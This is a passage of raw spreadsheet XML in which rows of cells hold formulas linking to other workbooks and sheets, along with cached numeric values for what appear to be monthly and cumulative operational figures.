        <v>126.812962089036</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]26'!$Y$107</f>
        <v>131.456249019057</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]26'!$T$107</f>
        <v>7.625</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]26'!$U$107</f>
        <v>40.75</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]26'!$V$107</f>
        <v>31.7096064814814</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]26'!$Q$107</f>
        <v>1.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]26'!$R$107</f>
        <v>254.28</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]26'!$S$107</f>
        <v>2739.71</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]26'!$D$27+'[11]26'!$D$18+'[13]26'!$D$26+'[14]26'!$D$10+'[14]26'!$D$17+'[15]26'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]26'!$E$27+'[11]26'!$E$18+'[13]26'!$E$26+'[14]26'!$E$10+'[14]26'!$E$17+'[15]26'!$E$9</f>
        <v>3334</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'25'!H8</f>
        <v>55165</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>580701.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]26'!$I$27+'[11]26'!$I$18+'[13]26'!$I$26+'[14]26'!$E$25+'[14]26'!$E$32+'[15]26'!$H$9</f>
        <v>2699.18</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'25'!K8</f>
        <v>65830.16</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>573574.87</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]26'!$L$27+'[11]26'!$L$18+'[13]26'!$L$26+'[14]26'!$H$25+'[14]26'!$H$32+'[15]26'!$K$9</f>
        <v>31214.74</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]26'!$W$108</f>
        <v>0</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]26'!$X$108</f>
        <v>133.125112188117</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]26'!$Y$108</f>
        <v>128.065767148744</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]26'!$T$108</f>
        <v>0</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]26'!$U$108</f>
        <v>44.6394230769231</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]26'!$V$108</f>
        <v>28.6504629629629</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]26'!$Q$108</f>
        <v>0</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]26'!$R$108</f>
        <v>278.55</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]26'!$S$108</f>
        <v>2475.4</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]26'!$D$24+'[11]26'!$D$19+'[12]26'!$D$20+'[13]26'!$D$27+'[14]26'!$D$11+'[14]26'!$D$18+'[15]26'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]26'!$E$24+'[11]26'!$E$19+'[12]26'!$E$20+'[13]26'!$E$27+'[14]26'!$E$11+'[14]26'!$E$18+'[15]26'!$E$10</f>
        <v>14520</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'25'!H9</f>
        <v>388285</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4523673.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]26'!$I$24+'[11]26'!$I$19+'[12]26'!$I$20+'[13]26'!$I$27+'[14]26'!$E$26+'[14]26'!$E$33+'[15]26'!$H$10</f>
        <v>13444.62</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'25'!K9</f>
        <v>405894.627</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4503373.438</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]26'!$L$24+'[11]26'!$L$19+'[12]26'!$L$20+'[13]26'!$L$27+'[14]26'!$H$26+'[14]26'!$H$33+'[15]26'!$K$10</f>
        <v>93256.085</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]26'!$W$109</f>
        <v>228.666666666667</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]26'!$X$109</f>
        <v>267.171314741036</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]26'!$Y$109</f>
        <v>271.003379127517</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]26'!$T$109</f>
        <v>37.5</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]26'!$U$109</f>
        <v>36.2019230769231</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]26'!$V$109</f>
        <v>34.970949074074</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]26'!$Q$109</f>
        <v>9</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]26'!$R$109</f>
        <v>225.9</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]26'!$S$109</f>
        <v>3021.48999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]26'!$D$25+'[11]26'!$D$20+'[12]26'!$D$21+'[13]26'!$D$28+'[14]26'!$D$12+'[14]26'!$D$19+'[15]26'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]26'!$E$25+'[11]26'!$E$20+'[12]26'!$E$21+'[13]26'!$E$28+'[14]26'!$E$12+'[14]26'!$E$19+'[15]26'!$E$11</f>
        <v>800</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'25'!H10</f>
        <v>61976</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>979503.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]26'!$I$25+'[11]26'!$I$20+'[12]26'!$I$21+'[13]26'!$I$28+'[14]26'!$E$27+'[14]26'!$E$34+'[15]26'!$H$11</f>
        <v>2908.2</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'25'!K10</f>
        <v>73720.7</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>970949.42</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]26'!$L$25+'[11]26'!$L$20+'[12]26'!$L$21+'[13]26'!$L$28+'[14]26'!$H$27+'[14]26'!$H$34+'[15]26'!$K$11</f>
        <v>49462.242</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]26'!$W$110</f>
        <v>239.089968976215</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]26'!$X$110</f>
        <v>249.798196650923</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]26'!$Y$110</f>
        <v>267.370268538786</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]26'!$T$110</f>
        <v>40.2916666666667</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]26'!$U$110</f>
        <v>37.323717948718</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]26'!$V$110</f>
        <v>34.687037037037</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]26'!$Q$110</f>
        <v>9.67</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]26'!$R$110</f>
        <v>232.9</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]26'!$S$110</f>
        <v>2996.96</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]26'!$D$26+'[11]26'!$D$21+'[12]26'!$D$19+'[13]26'!$D$29+'[14]26'!$D$13+'[14]26'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]26'!$E$26+'[11]26'!$E$21+'[12]26'!$E$19+'[13]26'!$E$29+'[14]26'!$E$13+'[14]26'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'25'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]26'!$I$26+'[11]26'!$I$21+'[12]26'!$I$19+'[13]26'!$I$29+'[14]26'!$E$28+'[14]26'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'25'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]26'!$L$26+'[11]26'!$L$21+'[12]26'!$L$19+'[13]26'!$L$29+'[14]26'!$H$28+'[14]26'!$H$35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5760.11000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'25'!H12</f>
        <v>196584.380000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5138975.63</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>16206.693</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'25'!K12</f>
        <v>433771.263</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5462877.639</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>185523.832000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>42.2605539863441</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]26'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]26'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]26'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]26'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]26'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]26'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]26'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]26'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]26'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'25'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'25'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>34.0410700917524</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]26'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]26'!$X$68</f>
        <v>263.636596158273</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]26'!$Y$68</f>
        <v>266.206969721701</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]26'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]26'!$U$68</f>
        <v>62.6554487179487</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]26'!$V$68</f>
        <v>70.9085648148148</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]26'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]26'!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]26'!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>3350</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'25'!H14</f>
        <v>70417</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1034960.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>6945.87</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'25'!K14</f>
        <v>141231.635</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1934175.741</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>53774.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]26'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]26'!$X$71</f>
        <v>220.228855721393</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]26'!$Y$71</f>
        <v>213.969212107209</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]26'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]26'!$U$71</f>
        <v>48.3173076923077</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]26'!$V$71</f>
        <v>50.0925925925926</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]26'!$Q$71</f>
        <v>0.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]26'!$R$71</f>
        <v>301.50</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]26'!$S$71</f>
        <v>4328.00</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'25'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>1323.463</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'25'!K15</f>
        <v>8875.168</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>123631.668</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]26'!$W$72</f>
        <v>61.7083333333333</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]26'!$X$72</f>
        <v>63.3370978206022</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]26'!$Y$72</f>
        <v>61.4747573400049</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]26'!$T$72</f>
        <v>100</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]26'!$U$72</f>
        <v>66.6939102564103</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]26'!$V$72</f>
        <v>51.9059027777778</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]26'!$Q$72</f>
        <v>24.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]26'!$R$72</f>
        <v>416.17</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]26'!$S$72</f>
        <v>4484.67</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'25'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'25'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]26'!$W$73</f>
        <v>58.625</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]26'!$X$73</f>
        <v>61.0452598954267</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]26'!$Y$73</f>
        <v>62.745568189691</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]26'!$T$73</f>
        <v>100</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]26'!$U$73</f>
        <v>67.7355769230769</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]26'!$V$73</f>
        <v>53.4592592592593</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]26'!$Q$73</f>
        <v>24.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]26'!$R$73</f>
        <v>422.67</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]26'!$S$73</f>
        <v>4618.88</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'25'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'25'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]26'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]26'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]26'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]26'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]26'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]26'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]26'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]26'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]26'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'25'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'25'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]26'!$W$74</f>
        <v>219.583333333333</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]26'!$X$74</f>
        <v>217.536585365854</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]26'!$Y$74</f>
        <v>221.784976627894</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]26'!$T$74</f>
        <v>50</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]26'!$U$74</f>
        <v>13.1410256410256</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]26'!$V$74</f>
        <v>7.45289351851852</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]26'!$Q$74</f>
        <v>12</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]26'!$R$74</f>
        <v>82</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]26'!$S$74</f>
        <v>643.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'25'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'25'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]26'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]26'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]26'!$Y$72</f>
        <v>9.15531335149864e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]26'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]26'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]26'!$V$72</f>
        <v>4.24768518518519e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]26'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]26'!$R$72</f>
        <v>2.6e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]26'!$S$72</f>
        <v>0.000367</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'25'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'25'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]26'!$W$73</f>
        <v>240.004573333143</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]26'!$X$73</f>
        <v>190.540269569225</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]26'!$Y$73</f>
        <v>237.971603708237</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]26'!$T$73</f>
        <v>100.000004166667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]26'!$U$73</f>
        <v>25.9471195512821</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]26'!$V$73</f>
        <v>68.7921338773148</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]26'!$Q$73</f>
        <v>24.000001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]26'!$R$73</f>
        <v>161.910026</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]26'!$S$73</f>
        <v>5943.640367</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]26'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]26'!$E$22</f>
        <v>4607</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'25'!H21</f>
        <v>187860</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2297298</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]26'!$I$22</f>
        <v>7613.98</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'25'!K21</f>
        <v>208871.99</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2275325.99</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]26'!$L$22</f>
        <v>62041.32</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>132.002808510638</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]26'!$W$81</f>
        <v>285.504963551778</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]26'!$X$81</f>
        <v>280.891286950064</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]26'!$Y$81</f>
        <v>276.028639154089</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]26'!$T$81</f>
